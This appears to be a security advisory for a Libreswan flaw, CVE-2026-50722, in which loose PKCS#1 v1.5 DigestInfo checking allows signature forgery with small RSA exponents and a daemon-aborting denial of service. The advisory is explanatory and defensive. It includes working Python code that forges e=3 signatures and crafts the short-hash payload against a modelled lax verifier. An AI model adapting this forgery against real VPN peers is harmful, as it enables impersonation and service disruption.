PT-2026-55316 · Libreswan · Libreswan

Andrew Cagney +2

Published 2026-07-02 · Updated 2026-07-02 · CVE-2026-50722

CVSS v3.1: 8.1 (High)
Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: Libreswan (affected versions not specified)

Description: Libreswan does not correctly verify the DER encoding of the ASN.1 DigestInfo structure carried in the IKEv2 AUTH payload when the RSASSA-PKCS1-v1_5 signature scheme is used. The check lives in the RSA_authenticate_hash_signature_pkcs1_1_5_rsa() function. Because the verifier does not require the recovered signature block to match the expected encoding exactly, a remote attacker can use a variant of Bleichenbacher's low-exponent signature forgery (the 2006 attack on PKCS#1 v1.5 verifiers that do not check the whole padded block, not the 1998 padding-oracle attack on RSA encryption) to construct an AUTH payload that passes verification without the private key whenever the public key being verified against uses a small exponent such as e=3. This allows impersonation of that peer. The same loose parsing also enables a denial of service: an AUTH payload that encodes a hash shorter than the negotiated hash length triggers an assertion, causing the IKE daemon (pluto) to abort and restart. Remote code execution is not possible, and verification of the remote IKE peer's X.509 certificate is unaffected.

Recommendations: At the moment, there is no information about a newer version that contains a fix for this vulnerability. Until one is available, avoid trusting RSA peer keys with small public exponents; keys with e=65537 are not subject to the cube-root forgery, although the assertion-based denial of service still applies.
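To make the two failure modes concrete, the following added example (written for this page, not libreswan code) models a lax PKCS#1 v1.5 verifier beside the strict RFC 8017 comparison, then forges signatures against the lax one with the e=3 cube-root trick. The lax verifier is a model of the described flaw (it walks the block left to right, trusts the peer-supplied OCTET STRING length and ignores whatever follows the digest); it is not a transcription of the libreswan function. The RSA key, the seed, the sample message and the assertion that stands in for the daemon abort are all constructed for the example; the DigestInfo prefix for SHA-256 is the real constant from RFC 8017.

```python
"""Model of the PKCS#1 v1.5 check behind CVE-2026-50722: a lax DigestInfo
parser versus the RFC 8017 comparison, plus an e=3 cube-root forgery.
Added example; the lax verifier models the flaw and is not libreswan code."""
import hashlib
import hmac
import random

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
E = 3  # the small public exponent the advisory warns about
SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n, rng, rounds=20):
    """Miller-Rabin; adequate for a demonstration key."""
    if n < 2 or any(n % p == 0 for p in SMALL_PRIMES):
        return n in SMALL_PRIMES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_rsa_key(bits, rng):
    """Return (n, d) for public exponent E. The top two bits of p and q are
    set so n has exactly `bits` bits, which the forgery bound relies on."""
    def prime():
        while True:
            c = rng.getrandbits(bits // 2) | (3 << (bits // 2 - 2)) | 1
            if (c - 1) % E != 0 and is_probable_prime(c, rng):
                return c
    p, q = prime(), prime()
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def emsa_pkcs1_v1_5(msg, k):
    """EM = 0x00 || 0x01 || 0xFF.. || 0x00 || DigestInfo (RFC 8017, 9.2)."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d, k):
    return pow(int.from_bytes(emsa_pkcs1_v1_5(msg, k), "big"), d, n).to_bytes(k, "big")


def verify_strict(msg, sig, n, k):
    """RFC 8017, 8.2.2: rebuild EM and compare the entire block."""
    s = int.from_bytes(sig, "big")
    if len(sig) != k or s >= n:
        return False
    em = pow(s, E, n).to_bytes(k, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v1_5(msg, k))


def verify_lax(msg, sig, n, k):
    """Model of the reported flaw: parse left to right, trust the peer-supplied
    OCTET STRING length, never check what follows the digest."""
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= k or em[i] != 0x00:
        return False
    i += 1
    head = SHA256_DIGESTINFO[:-1]          # everything before the digest length
    if em[i:i + len(head)] != head:
        return False
    i += len(head)
    digest = em[i + 1:i + 1 + em[i]]       # length byte chosen by the peer
    # Stands in for the advisory's assertion: later code assumes a full digest.
    assert len(digest) == 32, "digest length mismatch (daemon would abort)"
    return digest == hashlib.sha256(msg).digest()


def icbrt_ceil(m):
    """Smallest s with s**3 >= m (exact, via binary search)."""
    lo, hi = 0, 1 << ((m.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < m:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge_e3(em_head, k):
    """Bleichenbacher-style e=3 forgery: pick s so that s**3 (below n, hence
    never reduced) begins with em_head; the low bytes are whatever the cube
    produces, which a lax parser ignores. Needs 3*s**2 < 2**(8*slack)."""
    slack = k - len(em_head)
    s = icbrt_ceil(int.from_bytes(em_head + bytes(slack), "big"))
    if 3 * s * s + 3 * s + 1 >= 1 << (8 * slack):
        raise ValueError("not enough unchecked bytes for this modulus size")
    return s.to_bytes(k, "big")


def demo(bits=2048, seed=2026):
    """Constructed scenario: genuine signature, forged signature, short-hash DoS."""
    rng = random.Random(seed)
    n, d = gen_rsa_key(bits, rng)
    k = bits // 8
    msg = b"constructed sample: IKEv2 AUTH signed octets"
    h = hashlib.sha256(msg).digest()
    real = sign(msg, n, d, k)
    pad = b"\x00\x01" + b"\xff" * 8 + b"\x00"
    forged = forge_e3(pad + SHA256_DIGESTINFO + h, k)
    short = forge_e3(pad + SHA256_DIGESTINFO[:-1] + b"\x10" + h[:16], k)
    out = {"real_strict": verify_strict(msg, real, n, k),
           "real_lax": verify_lax(msg, real, n, k),
           "forged_strict": verify_strict(msg, forged, n, k),
           "forged_lax": verify_lax(msg, forged, n, k),
           "short_strict": verify_strict(msg, short, n, k)}
    try:
        verify_lax(msg, short, n, k)
        out["short_lax_aborts"] = False
    except AssertionError:
        out["short_lax_aborts"] = True
    return out


if __name__ == "__main__":
    print(demo())
```

Two details matter in practice. The forgery only has room to work when the unchecked tail of the block is long relative to the modulus (with the minimal 8-byte padding and a 2048-bit key there are 194 free bytes, comfortably above the 3·s² bound; `forge_e3` raises when that bound fails), which is why the exposure is tied to small exponents and why the strict comparison, not a larger key, is the fix. And the strict verifier never raises on malformed input: a wrong-length digest is simply a mismatch, so the short-hash payload that aborts the lax model is rejected quietly.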

Weakness Enumeration

Assertion Failure

Improper Verification of Cryptographic Signature

Related Identifiers

CVE-2026-50722

Affected Products

Libreswan